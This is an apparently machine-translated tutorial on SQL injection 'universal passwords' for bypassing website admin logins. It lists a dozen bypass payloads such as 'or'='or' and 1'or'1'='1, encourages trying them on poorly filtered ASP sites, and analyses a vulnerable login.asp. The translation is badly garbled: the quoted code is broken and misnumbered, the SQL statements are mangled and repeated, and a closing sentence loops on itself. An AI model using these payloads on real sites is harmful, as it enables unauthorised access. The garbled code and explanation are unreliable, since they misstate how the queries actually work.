The universal code has been around for years. I don’t take it seriously, the results of this really come in handy, but also really into the background of the website background universal password is in the user name and password are written in the following characters, if you know the administrator account directly add account, the effect will be better! For example we will use the first one is: user name: “or” a “=” a password: “or” a “=” a * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * 1: “or” a “=” a 2: ‘.) . Or. (‘. A. ‘=’. A 3: or 1 = 1 — 4: ‘or 1 = 1-5: a’ or ‘1 = 1-6:’ or 1 = 1-7: ‘the or.’ a ‘=’ a 8: “or” = “a ‘=’ a 9: ‘or’ a ‘=’ 10: The ‘or’=’or’ principle uses SQL syntax to make use of injection, which is also a type of injection, because the submitted characters are not filtered or filtered strictly. In fact, universal is not, the default is a lot of, admin admin admin admin888 a few ASP web page behind the login can use password 1’or’1’=’1(user name with admin, etc. Try) login success. This is usually the first lesson in SQL injection, which involves SQL statements… When verifying login, if password = entered password, then login succeeded, put 1′ or ‘1’=’1 then login succeeded “, because 1=1 is always valid, and “password =1” and “1=1” is logical or relationship, then the whole sentence is TRUE, that is, login succeeded. Does that make sense? In fact, background universal login password this title is really not so professional, perhaps called “background verification bypass statement” is better, but the former is more common. This statement is’ xor xor estimate a lot of people know, or heard of, is not exclusive or yao, he and the or and and are the same, but the or is or operation, and is conducted with operations, exclusive or xor is range is true, the comparison of the two values are not the same as for, the same is wrong, I searched the Internet, Almost no filter parameters, you can use the classic ‘or’=’or’ to enter, ‘xOR’ can enter, you can try it. Shallow solution to site universal password ‘or’=’or’ loophole ‘or’=’or’ is a relatively old loophole, mainly appears in the background login, using this loophole, we can not input the password directly into the system background. It occurs because of poor programming logic and the fact that single quotes are not filtered, which leads to bugs. Give you a brief introduction of the principle of holes, as long as we understand the principle, can oneself to find loopholes such system. 1: the statement: “‘ or ‘=’ or ‘a’ or ‘1 = 1 – or1 = 1 –” or1 = 1 – or1 = 1 – “or” = “a’ = ‘a’) or (‘a’=’a ‘, etc., 2: analysis and use: I downloaded from the webmaster website “weaving dream studio enterprise whole station program (original fine fine) modified beautification version” source code, from which to find the background login page “login.asp” which has the following code: <% (1) PWD = request.form(” PWD “) “get the password entered by the client and assign the value to PWD” (2)name = request.form(“name”) “Get the username entered by the client and assign the value to name” are not filtered (3)Set rs = server.createObject (” adodb.connection “) “create ADO component Connection object” (4) SQL = “select * From Manage_User where UserName='” &name &”‘ And PassWord='”&encrypt(PWD)&”‘” “Place the UserName And PassWord into a query statement to query the database” (5)Set rs = Conn. Execute(SQL) “Execute SQL statement” (6)If Not Rs.eof = True Then “Current record before last record of Connection object” (7)Session(“Name”) = Rs (“UserName”) = rs(“PassWord”) rs(“PassWord”) = rs(“PassWord”) Else (11) Response.redirect (” manage.asp “) Redirect “manage.asp” (10)Else (11) Response.redirect “loginsb.asp? MSG = You have entered the wrong account or password, please enter it again!” (12)End If (13)end if %> From this code, we can see the background verification is to use “Session”, as we all know, another is to use “cookies” verification, but the same principle, from the analysis, we can see the background login didn’t input the user name and password to the customer for any filtering, hand over to the SQL query, if the query record is located Before the last entry, the Session variables UserName and PassWord were set to Name and PWD respectively and redirected to “manage.asp “. Emerged from the above analysis. A lot of security holes, problems arise in the first, second, their function is to obtain the client input user name and password without any filter, also won’t go to check our input data, so that we can implement to its attack, to attack this key problem is the vulnerability of the SQL query result is true Here we also need to use the knowledge of or and logical operation, I do not say in detail here, just talk about two points, first: the principle of priority —- appear or and at the same time appear and, the first operation and operator. Second: the AND operator means “and”, which is the logical “and” operation on two expressions (I’m saying “and” here), and the OR operator means “or”, which is the logical “or” operation on two expressions. The following is the result of the two operators: and the result of the logical operation: true —- === true; False —- true === false; True —- false === false; False —- False === false. Or Result of logical operation: true —- true === true; False —- true === true; True —- false === true; False —- false === false. SQL = “select * from Manage_User where UserName='” &name & “‘ And select * from Manage_User where UserName='” &name & “‘ And PassWord='”&encrypt(PWD)&”‘ “, and to make this true, we need to create a special user name, so we can bypass the authentication and go into the background, so we just type ‘or’=’or’ in the user name, and we’ll just type ‘000’ in the PassWord, SQL = “select * from Manage_User where UserName=’ or’=’or’ and Mysql > select * from SQL where id =’000′ where id =’000′ PassWord=’000′; SQL = “select * from Manage_User where UserName=’1′ or 1=1 or ‘1’=’1′ and select * from Manage_User where UserName=’1′ or 1=1 or ‘1’=’1′ and PassWord=’000′ PassWord=’000′ PassWord=’000′ PassWord=’000′ PassWord=’000′ PassWord=’000′ PassWord=’000′ PassWord=’000′ PassWord=’000′ PassWord=’000′ These we slowly to practice, to experience, I believe we will understand, we can also construct some statements to verify their own. For Session authentication, we can also perform Session spoofing. Assuming we know the user name of the system administrator admin, then we only need to enter the statement in the password to make it true. Coolie logon is the same as Session logon, as long as the coolie logon is the same as Session logon, as long as the coolie logon is the same as Session logon, as long as the coolie logon is the same as Session logon.